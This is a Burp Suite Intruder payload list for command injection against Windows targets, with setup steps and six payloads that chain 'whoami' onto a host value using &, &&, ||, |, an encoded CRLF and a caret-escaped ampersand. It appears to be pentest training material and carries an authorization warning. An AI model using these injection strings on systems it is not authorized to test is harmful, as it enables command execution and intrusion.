# ============================================================================
# BURP SUITE INTRUDER PAYLOAD LIST
# Tool    : Command Injection Pattern Generator
# Author  : Offensive Team Zeta - ITSOLERA (PVT) LTD
# Created : 2026-02-20 18:30:04
# Target  : WINDOWS OS patterns
# Usage   : Burp Suite > Intruder > Payloads > Load > (this file)
# WARNING : Use ONLY on authorized targets with written permission
# NOTE    : These are NON-EXECUTABLE string templates only
# ============================================================================

# HOW TO USE:
#   1. Open Burp Suite → Proxy → Intercept a request
#   2. Right-click → Send to Intruder
#   3. Intruder → Positions → mark your injection point (Add §)
#   4. Intruder → Payloads → Payload type: Simple list
#   5. Click Load → select this file
#   6. Click Start Attack (authorized lab / DVWA ONLY)

# ============================================================================
# WINDOWS INJECTION PATTERNS
# ============================================================================
# [Separator: &] Windows ampersand — runs second command unconditionally (cmd.exe)
127.0.0.1 & whoami
# [Separator: &&] Windows AND — second command runs only if first succeeds
127.0.0.1 && whoami
# [Separator: ||] Windows OR — second command runs only if first fails
invalid_host || whoami
# [Separator: |] Windows pipe — stdout of first becomes stdin of second
127.0.0.1 | whoami
# [Separator: %0D%0A] CRLF encoded newline — cmd.exe treats CR+LF as command delimiter
127.0.0.1%0D%0Awhoami
# [Separator: ^&] Caret-escaped ampersand — cmd.exe caret is an escape character
127.0.0.1 ^& whoami

